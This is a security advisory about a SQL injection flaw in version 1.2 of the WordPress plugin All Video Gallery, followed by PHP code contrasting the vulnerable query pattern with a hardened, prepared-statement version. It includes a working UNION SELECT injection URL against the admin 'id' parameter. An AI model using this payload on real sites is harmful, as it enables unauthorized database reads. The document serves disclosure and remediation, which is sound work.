WP Plugin All Video Gallery

Plugin Details

Plugin Name: wp-plugin : all-video-gallery
Affected Version : 1.2 (and most probably lower versions, if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
WPScan Reference URL

Disclosure Timeline

Technical Details

<http://localhost/wp-admin/admin.php?page=allvideogallery_videos&opt=edit&id=2 union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18>

Although version 1.2 was released to fix similar issues, this particular instance was not fixed, on the grounds that this interface is only accessible to administrators.
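The request above works because the `id` parameter reaches the SQL text unchanged. As an added illustration (not the plugin's own source), the sketch below shows the concatenation pattern that produces this behaviour beside a hardened handler. The function names and the `example_videos` table are hypothetical; `$wpdb`, `absint()`, `wp_unslash()`, `current_user_can()` and `wp_die()` are standard WordPress APIs.

```php
<?php
// Added illustration, not the plugin's code. Function names and the table
// name are hypothetical placeholders.

// Vulnerable pattern (assumed): the raw `id` query parameter is concatenated
// into the statement, so anything following the number becomes SQL.
function avg_example_get_video_unsafe() {
    global $wpdb;
    $table = $wpdb->prefix . 'example_videos'; // hypothetical table name
    $id    = $_GET['id'];
    return $wpdb->get_row( "SELECT * FROM $table WHERE id = $id" );
}

// Hardened form: check the capability, accept digits only, and bind the
// value through a prepared statement with the %d placeholder.
function avg_example_get_video_safe() {
    global $wpdb;

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // Reject arrays, empty values and anything that is not purely numeric,
    // e.g. "2 union select ..." fails here before any query is built.
    $raw = isset( $_GET['id'] ) ? wp_unslash( $_GET['id'] ) : '';
    if ( ! is_string( $raw ) || ! ctype_digit( $raw ) ) {
        wp_die( 'Invalid video id.' );
    }
    $id = absint( $raw );

    $table = $wpdb->prefix . 'example_videos'; // hypothetical table name
    return $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id )
    );
}
```

The digit check and the `%d` binding each stop the appended clause on their own; keeping both means a later refactor that drops one still leaves the query parameterised or the input validated.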